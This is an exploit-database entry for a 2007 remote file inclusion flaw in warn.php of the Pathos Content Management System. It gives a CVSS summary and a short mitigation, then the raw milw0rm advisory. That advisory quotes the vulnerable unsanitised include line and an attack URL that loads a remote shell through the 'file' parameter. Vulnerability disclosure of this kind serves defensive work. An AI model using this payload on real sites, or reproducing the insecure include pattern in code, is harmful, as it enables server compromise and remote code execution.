Pathos Content Management System

vendor:

by:

kezzap66345

7.5

CVSS

HIGH

Remote File Inclusion (RFI)

CWE

Product Name: Pathos Content Management System

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Pathos Content Management System

The Pathos Content Management System is vulnerable to a remote file inclusion (RFI) vulnerability in the 'warn.php' file. The vulnerability allows an attacker to include arbitrary remote files by manipulating the 'file' parameter in the URL.

Mitigation:

To mitigate this vulnerability, the vendor should validate and sanitize user input when including files.

Source

Exploit-DB raw data:

Pathos Content Management System
*****************
Found by kezzap66345 *
*****************
*****************
Script download::    http://sourceforge.net/projects/pathos/
Direct link     :
http://sourceforge.net/project/showfiles.php?group_id=103303&package_id=110862&release_id=243512

*****************
*****************
ERROR#1:
File:warn.php
*****************

include_once($_GET['file'] . ".html");   <<< rfi coded


**************************************************************************************
RFI#1:

http://SITE.com/path/warn.php?file=[SHELL]


**************************************************************************************
**************************************************************************************
Thanks:@_-_-_| i!..:: S.H.i.K.a.A ::..!i
****x0r0n**********..:a.j.a.n..:*************
**************************************************************************************
**************************************************************************************
**************************************************************************************
**************************************************************************************
******Thanx****SiiRCiCOCUK****str0ke**************************************************

# milw0rm.com [2007-04-09]